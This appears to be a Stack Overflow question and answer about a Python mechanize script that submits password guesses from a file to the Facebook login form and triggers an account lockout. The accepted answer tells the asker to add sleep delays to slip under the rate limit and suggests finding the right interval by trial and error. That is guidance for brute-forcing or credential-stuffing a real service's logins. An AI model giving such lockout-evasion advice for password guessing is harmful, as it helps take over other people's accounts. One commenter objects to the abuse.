# Trying to get Facebook account password too often locks me out

Tags: python, http, mechanize-python

I was locked out of my Facebook account for a few hours after I tried to make a script get my password (I already know my account's password). Do I have a problem in my python script, or is the way I tried to use it wrong?

Script:

```
passwordsfile = open('file.txt','r')
for pwd in psswordsfile.read():
    br = mechanize.Browser()
    br.set_handle_robots(False)
    br.addheader = ['User-Agent','Firefox']
    br.open('https://www.facebook.com')
    br.select_form(nr=0)
    br.form['email'] = "emai@..."
    br.form['pass'] = pwd
    sub = br.submit()
    print sub.geturl()
```

Comment: thanks sir but how many time chould i put between two tryes

Answer (score 0, accepted):

This error is straightforward. "trying too often" means you are sending too many requests in X amount of time. You should `sleep` between iterations.

```
from time import sleep

passwordsfile = open('file.txt','r')
for pwd in psswordsfile.read():
    br = mechanize.Browser()
    br.set_handle_robots(False)
    br.addheader = ['User-Agent','Firefox']
    br.open('https://www.facebook.com')
    br.select_form(nr=0)
    br.form['email'] = "emai@..."
    br.form['pass'] = pwd
    sub = br.submit()
    print sub.geturl()
    sleep(5)  # 5 seconds
```

Depending on the number of iterations you have, 5 seconds might not be enough. This is a matter of trial and error.

Comment: It might also be wise to use a "throw-away" account. I doubt Facebook likes people scripting things against their site (without an API anyways, which I doubt they supply) and, if they detect this, may ban the account. If [Alan](https://stackoverflow.com/users/8202639/alan) has anything of value on that account, it could be lost.

Comment: thanks but sleep for 5 seconds did not works for me and egain my account is closed

Comment: @alan Let me quote myself: "Depending on the number of iterations you have, 5 seconds might not be enough. This is a matter of trial and error."

Comment: what would you like to do if you were in my situation

Comment: @alan I'd probably not be abusing Facebook's servers to begin with.